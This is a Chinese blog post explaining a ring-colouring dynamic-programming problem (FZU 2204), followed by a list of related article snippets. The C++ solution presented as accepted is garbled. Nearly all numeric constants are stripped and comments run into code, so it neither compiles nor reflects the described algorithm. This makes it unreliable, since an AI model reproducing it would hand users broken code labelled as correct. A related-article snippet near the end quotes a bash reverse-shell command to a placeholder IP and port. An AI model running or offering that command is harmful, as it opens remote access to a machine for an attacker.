FZU 2204 7
题意:
n个有标号的球围成一个圈。每个球有两种颜色可以选择黑或白染色。问有多少种方案使得没有出现连续白球7个或连续黑球7个?
思路:
如果出现连续的8,9...个球同色,那么也必定含有7个同色。需要统计两部分,第一部分是将n个球看成一个序列,在不允许出现连续7个同色球的情况下,统计其可能出现的所有方案数。第二部分是,在第一部分中统计到的,有可能在一个圈的接口处可能出现超过6个球同色的,那么只需要再统计一下这一情况的方案数。问题在于这里。
序列上肯定不会超过6个同色,所以环的头尾加起来最多有12个同色球,即序列前6个,序列后6个。但是如果n<=12的话,还不会出现环接口处12个同色的情况,需要分类讨论。假设n=8,那么最多可能出现7个同色(根据第一部分的假设),若n=9,最多可能出现8个同色....若n=13,最多可能出现12个同色。先假设序列A={7,8,9,10,11,12}。
如何求第二部分?假如n=8,那么最多可能出现7个连色,那么就先假设前7个球都是黑色,剩下1个球,只能是白色了,所以方案数为1。但是前7个球可能是白色的,而剩下的1球是黑色的,这只需要将前面的方案数乘以2就行了。而这7个连色的球还可能在环上的不同位置出现,所以还得再乘以(13-7)。其他的大概也是这样推的,只是部分处理可能不同。
//#include <bits/stdc++.h>
#include <iostream>
#include <cstdio>
#include <cstring>
#include <cmath>
#include <map>
#include <algorithm>
#include <vector>
#include <iostream>
#define pii pair<int,int>
#define INF 0x7f3f3f3f
#define LL long long
#define ULL unsigned long long
using namespace std;
const double PI = acos(-1.0);
const int M=;
int cur, dp[][<<], ans[], up=<<, mod=<<; void DP(int n)
{
for(int i=; i<=n; i++)
{
ans[]=ans[i]=;
cur^=;
memset(dp[cur], , sizeof(dp[cur]));
for(int s=,t,v; s<up; s++)
{
v=dp[cur^][s];
t=(s&(mod-))<<; //取低5位 if(s+==up) //6黑
{
dp[cur][t]+=v;
ans[i]+=v; //只取白色结尾的
ans[]+=v;
}
else if(s==) //6白
{
dp[cur][t+]+=v;
ans[]+=v;
}
else
{
dp[cur][t]+=v;
dp[cur][t+]+=v;
ans[i]+=v;
ans[]+=v+v;
} dp[cur][t]%=M;
dp[cur][t+]%=M;
ans[i]%=M;
ans[]%=M;
}
}
} int cal(int n)
{
if(n<) return <<n;
if(n==) return ; memset(dp[cur=],,sizeof(dp[cur]));
dp[cur][up-]=; //默认前7个全黑,但是状态只记6位
DP(n);
int ans1=ans[]*%M, ans2=;
for(int k=; k<=; k++) //最多可能取到6+6=12个同颜色的
if(n-k>)
ans2=(ans2+ans[n-k]**(-k))%M; //枚举13-k个位置 return (ans1+M-ans2)%M;
} int main()
{
//freopen("input.txt","r",stdin);
int n, t, Case=;
scanf("%d",&t);
while(t--)
{
scanf("%d",&n);
printf("Case #%d: %d\n",++Case,cal(n));
}
return ;
}
AC代码
FZU 2204 7的更多相关文章
- fzu 2204 7 dp
题目链接: fzu 2204 7 题目描述: 给出n个小球,每个小球只能涂黑色或者是白色,七个连续的不能是同种颜色,问有多少种涂色方法? 解题思路: 刚开始没有考虑到是环形的,WA的风生水起,怪我咯! ...
- FZU - 2204 简单环形dp
FZU - 2204 简单环形dp 题目链接 n个有标号的球围成一个圈.每个球有两种颜色可以选择黑或白染色.问有多少种方案使得没有出现连续白球7个或连续黑球7个. 输入 第一行有多组数据.第一行T表示 ...
- FZU 2137 奇异字符串 后缀树组+RMQ
题目连接:http://acm.fzu.edu.cn/problem.php?pid=2137 题解: 枚举x位置,向左右延伸计算答案 如何计算答案:对字符串建立SA,那么对于想双延伸的长度L,假如有 ...
- FZU 1914 单调队列
题目链接:http://acm.fzu.edu.cn/problem.php?pid=1914 题意: 给出一个数列,如果它的前i(1<=i<=n)项和都是正的,那么这个数列是正的,问这个 ...
- ACM: FZU 2105 Digits Count - 位运算的线段树【黑科技福利】
FZU 2105 Digits Count Time Limit:10000MS Memory Limit:262144KB 64bit IO Format:%I64d & ...
- FZU 2112 并查集、欧拉通路
原题:http://acm.fzu.edu.cn/problem.php?pid=2112 首先是,票上没有提到的点是不需要去的. 然后我们先考虑这个图有几个连通分量,我们可以用一个并查集来维护,假设 ...
- ACM: FZU 2107 Hua Rong Dao - DFS - 暴力
FZU 2107 Hua Rong Dao Time Limit:1000MS Memory Limit:32768KB 64bit IO Format:%I64d & %I6 ...
- ACM: FZU 2112 Tickets - 欧拉回路 - 并查集
FZU 2112 Tickets Time Limit:3000MS Memory Limit:32768KB 64bit IO Format:%I64d & %I64u P ...
- ACM: FZU 2102 Solve equation - 手速题
FZU 2102 Solve equation Time Limit:1000MS Memory Limit:32768KB 64bit IO Format:%I64d & ...
随机推荐
- 性能测试之Jmeter学习(十)
分布式部署(转载) 一.分布式介绍: Jmeter 是java 应用,对于CPU和内存的消耗比较大,因此,当需要模拟数以千计的并发用户时,使用单台机器模拟所有的并发用户就有些力不从心,甚至会引起JAV ...
- HDU-5979
Convex Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/65536 K (Java/Others)Total Subm ...
- Eclipse 安装插件
Eclipse 安装插件 本文介绍Eclipse插件的安装方法.Eclipse插件的安装方法大体有三种:直接复制.使用link文件,以及使用eclipse自带的图形界面的插件安装方法. AD: 做为当 ...
- 13. linux渗透之反弹shell
实验环境 CentOS 6.5:192.168.0.3 kali2.0:192.168.0.4 方法1: 反弹shell命令如下: bash -i >& /dev/tcp/ip/port ...
- Vue+Electron下Vuex的Dispatch没有效果的解决方案
这个问题是解决基于 vue 和 electron 的开发中使用 vuex 的 dispatch 无效的问题,即解决了 Please, don't use direct commit's, use di ...
- Codeforces Round #459 (Div. 2):D. MADMAX(记忆化搜索+博弈论)
题意 在一个有向无环图上,两个人分别从一个点出发,两人轮流从当前点沿着某条边移动,要求经过的边权不小于上一轮对方经过的边权(ASCII码),如果一方不能移动,则判负.两人都采取最优策略,求两人分别从每 ...
- 洛谷 P1070 道路游戏(noip 2009 普及组 第四题)
题目描述 小新正在玩一个简单的电脑游戏. 游戏中有一条环形马路,马路上有 nn个机器人工厂,两个相邻机器人工厂之间由一小段马路连接.小新以某个机器人工厂为起点,按顺时针顺序依次将这 nn个机器人工厂编 ...
- 洛谷P4822 冻结
题目描述 "我要成为魔法少女!" "那么,以灵魂为代价,你希望得到什么?" "我要将有关魔法和奇迹的一切,封印于卡片之中„„" 在这个愿望被 ...
- 登录案例version1 基本登录+验证码
package com.frxx.web.servlet; import com.frxx.domain.User; import com.frxx.service.impl.UserServiceI ...
- Codeforces 163E(ac自动机、树状数组)
要点 显然ac自动机的板子就可以暴力一下答案了 为了优化时间复杂度,考虑套路fail树的dfs序.发现本题需要当前这个尾点加上所有祖先点的个数,考虑使用树状数组差分一下,在父点+1,在子树后-1,每次 ...